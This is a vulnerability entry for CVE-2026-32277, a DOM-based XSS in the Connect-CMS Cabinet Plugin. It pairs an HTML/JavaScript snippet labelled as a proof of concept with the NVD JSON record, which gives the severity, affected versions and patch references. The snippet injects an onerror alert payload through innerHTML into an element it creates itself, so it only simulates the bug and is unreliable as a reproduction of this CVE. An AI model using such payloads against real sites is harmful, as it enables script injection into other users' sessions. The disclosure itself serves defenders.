CVE-2026-32277

<!-- // PoC for CVE-2026-32277: Connect-CMS DOM-based XSS // Description: This script simulates the exploitation of the DOM XSS vulnerability // in the Cabinet Plugin list view by injecting a payload via a vulnerable parameter. --> <script> // Simulating the vulnerable sink in the Cabinet Plugin list view // In a real scenario, this data comes from the URL hash or query parameters // controlled by the attacker. function exploit() { var maliciousPayload = '<img src=x onerror=alert(\'XSS-CVE-2026-32277\')>'; // The vulnerability occurs when user input is directly placed into the DOM // without sanitization, for example using innerHTML. var vulnerableElement = document.getElementById('plugin-list-container'); if (vulnerableElement) { console.log('Injecting payload into DOM...'); vulnerableElement.innerHTML = maliciousPayload; } else { console.log('Target element not found. Creating a test element.'); var testDiv = document.createElement('div'); testDiv.id = 'plugin-list-container'; document.body.appendChild(testDiv); testDiv.innerHTML = maliciousPayload; } } // Execute the exploit exploit(); </script>

{"cve": {"id": "CVE-2026-32277", "sourceIdentifier": "[email protected]", "published": "2026-03-23T22:16:27.260", "lastModified": "2026-03-24T20:01:38.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Connect-CMS is a content management system. In versions 1.35.0 through 1.41.0 and 2.35.0 through 2.41.0, a DOM-based Cross-Site Scripting (XSS) issue exists in the Cabinet Plugin list view. Versions 1.41.1 and 2.41.1 contain a patch."}, {"lang": "es", "value": "Connect-CMS es un sistema de gestión de contenido. En las versiones 1.35.0 a 1.41.0 y 2.35.0 a 2.41.0, existe un problema de cross-site scripting (XSS) basado en DOM en la vista de lista del plugin Cabinet. Las versiones 1.41.1 y 2.41.1 contienen un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.35.0", "versionEndExcluding": "1.41.1", "matchCriteriaId": "6DF5FAFA-D40D-41DD-8063-0FC58BFDF13F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.35.0", "versionEndExcluding": "2.41.1", "matchCriteriaId": "8390303C-0316-455A-AF15-2682746BF7AD"}]}]}], "references": [{"url": "https://github.com/opensource-workshop/connect-cms/commit/c04dc40f814eff891915752ef1ec00ba6612441c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v1.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v2.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-cmfh-mpmf-fmq4", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}